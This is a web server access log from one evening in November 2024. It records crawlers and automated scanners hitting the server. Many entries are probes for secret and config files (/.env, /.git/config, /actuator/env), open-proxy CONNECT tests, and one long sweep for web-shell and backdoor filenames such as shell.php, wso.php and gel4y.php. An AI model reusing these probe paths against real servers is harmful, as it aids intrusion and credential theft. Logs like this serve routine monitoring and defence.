156.59.198.135 - - [24/Nov/2024:20:05:10 +0100] "GET /ed-test.2web.at/etc/redirects/redirects.xls HTTP/1.0" 404 301 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:20:16:44 +0100] "GET /renault.2web.at/htdocs/binaries/10006727.doc HTTP/1.0" 404 307 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
195.178.110.57 - - [24/Nov/2024:20:19:41 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
156.59.198.136 - - [24/Nov/2024:20:20:44 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/FAQ.md HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
46.19.138.234 - - [24/Nov/2024:20:21:06 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.178.110.57 - - [24/Nov/2024:20:21:43 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 8.0.0; HTC U11 plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
156.59.198.136 - - [24/Nov/2024:20:49:19 +0100] "GET /ed-test.2web.at/stats/lang/awstats-hr.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [24/Nov/2024:20:50:35 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.135 - - [24/Nov/2024:20:53:20 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image030.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:20:57:20 +0100] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20230917225211.xml HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
80.82.77.202 - - [24/Nov/2024:21:08:04 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
205.210.31.47 - - [24/Nov/2024:21:09:51 +0100] "GET / HTTP/1.0" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.120.84.12 - - [24/Nov/2024:21:42:45 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3803.0 Safari/537.36 Edg/76.0.174.0"
109.194.243.115 - - [24/Nov/2024:21:47:23 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
156.59.198.136 - - [24/Nov/2024:21:47:57 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/README.md HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:21:51:57 +0100] "GET /renault.2web.at/htdocs/binaries/10449712.doc HTTP/1.0" 404 308 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:21:55:58 +0100] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20231019095110.xml HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:21:59:58 +0100] "GET /renault.activities.at/htdocs/activities/framework/KoolControls/KoolCalendar/info.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:22:03:58 +0100] "GET /renault.2web.at/htdocs/export/xml/data/exportArticles_20230924035604.xml HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.130.44.88 - - [24/Nov/2024:22:08:17 +0100] "GET /env HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:22:08:24 +0100] "GET /actuator/env HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
194.50.16.198 - - [24/Nov/2024:22:08:25 +0100] "GET /cgi-bin/index.html HTTP/1.1" 404 363 "-" "-"
156.59.198.136 - - [24/Nov/2024:22:11:43 +0100] "GET /ed-test.2web.at/stats/lang/awstats-lv.txt HTTP/1.0" 404 303 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
104.152.52.218 - - [24/Nov/2024:22:11:57 +0100] "GET / HTTP/1.0" 200 423 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
185.130.44.88 - - [24/Nov/2024:22:13:23 +0100] "GET /env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:22:13:53 +0100] "GET /gate;/env HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:22:14:05 +0100] "GET /api;/env HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:22:14:40 +0100] "GET /gateway;/env HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:22:14:55 +0100] "GET /gate;/actuator/env HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:22:15:02 +0100] "GET /api;/actuator/env HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
185.130.44.88 - - [24/Nov/2024:22:15:28 +0100] "GET /gateway;/actuator/env HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
156.59.198.135 - - [24/Nov/2024:22:15:44 +0100] "GET /renault.activities.at/htdocs/binaries/10269839.pdf HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.7.248 - - [24/Nov/2024:22:21:36 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [24/Nov/2024:22:21:37 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
141.98.7.248 - - [24/Nov/2024:22:21:38 +0100] "CONNECT 1.1.1.1:443 HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
54.173.57.215 - - [24/Nov/2024:22:22:17 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3"
95.214.55.79 - - [24/Nov/2024:22:24:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.178.110.57 - - [24/Nov/2024:22:40:53 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; SM-M205FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
195.178.110.57 - - [24/Nov/2024:22:41:40 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; Android 9; Mi MIX 2S) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
54.173.57.215 - - [24/Nov/2024:22:45:36 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0"
156.59.198.135 - - [24/Nov/2024:22:51:03 +0100] "GET /renault.activities.at/htdocs/binaries/10008643.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.113.56 - - [24/Nov/2024:22:51:51 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36"
172.168.40.200 - - [24/Nov/2024:22:53:02 +0100] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
54.173.57.215 - - [24/Nov/2024:23:03:54 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0"
87.120.113.56 - - [24/Nov/2024:23:04:15 +0100] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; KFTT Build/IML74K) AppleWebKit/535.19 (KHTML, like Gecko) Silk/2.1 Mobile Safari/535.19 Silk-Accelerated=true"
156.59.198.135 - - [24/Nov/2024:23:12:34 +0100] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/API.md HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [24/Nov/2024:23:16:34 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202001071803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [24/Nov/2024:23:20:34 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image093.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.248 - - [24/Nov/2024:23:25:33 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
84.247.150.175 - - [24/Nov/2024:23:33:44 +0100] "GET /gzak2w.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:44 +0100] "GET /wp-activate.php HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:45 +0100] "GET /templates/beez3/index.php HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:45 +0100] "GET /insoamv.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:45 +0100] "GET /hehehehe.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:46 +0100] "GET /print/bkindex.php HTTP/1.1" 404 303 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:47 +0100] "GET /wp-includes/fonts/about.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:48 +0100] "GET /wp-admin/images/about.php HTTP/1.1" 404 308 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:48 +0100] "GET /edit.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:49 +0100] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:49 +0100] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:49 +0100] "GET /wp-content/index.php HTTP/1.1" 404 304 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:50 +0100] "GET /sad/about.php HTTP/1.1" 404 300 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:50 +0100] "GET /wp-content/plugins/not/includes/about.php HTTP/1.1" 404 318 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:50 +0100] "GET /wp-add.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:51 +0100] "GET /vendor/bin/loader.php HTTP/1.1" 404 304 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:51 +0100] "GET /wp-admin/network/gzak2w.php HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:52 +0100] "GET /wp-admin/network/back.php HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:52 +0100] "GET /back.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:52 +0100] "GET /ova.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:53 +0100] "GET /wp-content/x/index.php HTTP/1.1" 404 306 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:53 +0100] "GET /randkeyword.PhP7 HTTP/1.1" 404 302 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:53 +0100] "GET /wp-content/themes/digital-download/new.php HTTP/1.1" 404 319 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:54 +0100] "GET /ticket/vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:54 +0100] "GET /glpi/vendor/network.php HTTP/1.1" 404 307 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:55 +0100] "GET /vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:55 +0100] "GET /wp-includes/sodium_compat/src/Core/Curve25519/Ge/network.php HTTP/1.1" 404 333 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:55 +0100] "GET /wp-22.php?bction=ping HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:56 +0100] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:56 +0100] "GET /upload.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:56 +0100] "GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1" 404 320 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:57 +0100] "GET /about.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:57 +0100] "GET /chosen.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:57 +0100] "GET /admin.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:58 +0100] "GET /file.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:58 +0100] "GET /simple.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:59 +0100] "GET /alfanew.PhP7 HTTP/1.1" 404 300 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:59 +0100] "GET /mah.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:33:59 +0100] "GET /wp-content/plugins/revslider/includes/external/page/index.php HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:00 +0100] "GET /css/index.php HTTP/1.1" 404 300 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:00 +0100] "GET /wp-content/plugins/index.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:00 +0100] "GET /test.php HTTP/1.1" 200 20 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:01 +0100] "GET /wp-content/plugins/pwnd/pwnd.php HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:01 +0100] "GET /wp-admin/maint/index.php HTTP/1.1" 404 308 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:01 +0100] "GET /dropdown.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:02 +0100] "GET /wp-content/ HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:02 +0100] "GET /home.php?xsec=team HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:03 +0100] "GET /themes.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:03 +0100] "GET /1.php HTTP/1.1" 404 295 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:03 +0100] "GET /wp-content/themes/sketch/404.php HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:04 +0100] "GET /wp-content/uploads/index.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:04 +0100] "GET /wp-content/languages/index.php HTTP/1.1" 404 312 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:04 +0100] "GET /.well-known/pki-validation/moon.php HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:05 +0100] "GET /wp-login.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:05 +0100] "GET /wp-admin/js/index.php HTTP/1.1" 404 306 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:06 +0100] "GET /wp-content/themes/pridmag/db.php?u HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:06 +0100] "GET /wp-content/admin.php HTTP/1.1" 404 304 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:06 +0100] "GET /index/function.php HTTP/1.1" 404 304 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:07 +0100] "GET /lala.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:07 +0100] "GET /wp-includes/assets/index.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:07 +0100] "GET /shell.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:08 +0100] "GET /about/function.php HTTP/1.1" 404 303 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:08 +0100] "GET /lock.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:08 +0100] "GET /autoload_classmap.php HTTP/1.1" 404 305 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:09 +0100] "GET /goods.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:09 +0100] "GET /x/index.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:10 +0100] "GET /uploader.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:10 +0100] "GET /credits.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:10 +0100] "GET /wp-links.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:11 +0100] "GET /wp-admin/images/index.php HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:11 +0100] "GET /wp-header.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:11 +0100] "GET /wp-admin/css/index.php HTTP/1.1" 404 306 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:12 +0100] "GET /wp-admin/css/colors/index.php HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:12 +0100] "GET /cong.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:13 +0100] "GET /en/index.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:13 +0100] "GET /wp-includes/widgets/include.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:13 +0100] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 404 308 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:14 +0100] "GET /jindex.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:14 +0100] "GET /b.php HTTP/1.1" 404 295 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:14 +0100] "GET /function.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:15 +0100] "GET /classwithtostring.php HTTP/1.1" 404 304 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:15 +0100] "GET /404.php HTTP/1.1" 404 295 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:15 +0100] "GET /wp-mail.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:16 +0100] "GET /moon.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:16 +0100] "GET /wp-info.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:17 +0100] "GET /wp-includes/js/jcrop/Jcrop.php HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:17 +0100] "GET /a.php HTTP/1.1" 404 295 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:17 +0100] "GET /wp-admin.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:18 +0100] "GET /atomlib.php HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:18 +0100] "GET /wp-content/themes.php HTTP/1.1" 404 305 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:18 +0100] "GET /wp.php HTTP/1.1" 404 295 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:19 +0100] "GET /wp-includes/rest-api/index.php HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:19 +0100] "GET /fm.php HTTP/1.1" 404 295 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:20 +0100] "GET /wp-content/themes/twentyfive/include.php HTTP/1.1" 404 318 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:20 +0100] "GET /wso.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:21 +0100] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:21 +0100] "GET /text.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:22 +0100] "GET /content.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:22 +0100] "GET /install.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:22 +0100] "GET /ova-tools.php HTTP/1.1" 404 300 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:23 +0100] "GET /wp-conflg.php HTTP/1.1" 404 300 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:23 +0100] "GET /log.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:23 +0100] "GET /radio.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:24 +0100] "GET /wp-includes/wp-login.php HTTP/1.1" 404 306 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:24 +0100] "GET /xml.php HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:24 +0100] "GET /wp-includes/images/wp-login.php HTTP/1.1" 404 311 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:25 +0100] "GET /.well-known/pki-validation/ HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:25 +0100] "GET /wp-admin/user/about.php HTTP/1.1" 404 306 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:26 +0100] "GET /wp-includes/SimplePie/index.php HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:26 +0100] "GET /inc.php HTTP/1.1" 404 296 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:27 +0100] "GET /wp-includes/item.php HTTP/1.1" 404 304 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:27 +0100] "GET /.well-known/ HTTP/1.1" 404 299 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:27 +0100] "GET /wp-includes/Text/wp-login.php HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:28 +0100] "GET /wp-content/plugins/hello.php HTTP/1.1" 404 309 "-" "Go-http-client/1.1"
84.247.150.175 - - [24/Nov/2024:23:34:28 +0100] "GET /wp-includes/admin.php HTTP/1.1" 404 305 "-" "Go-http-client/1.1"
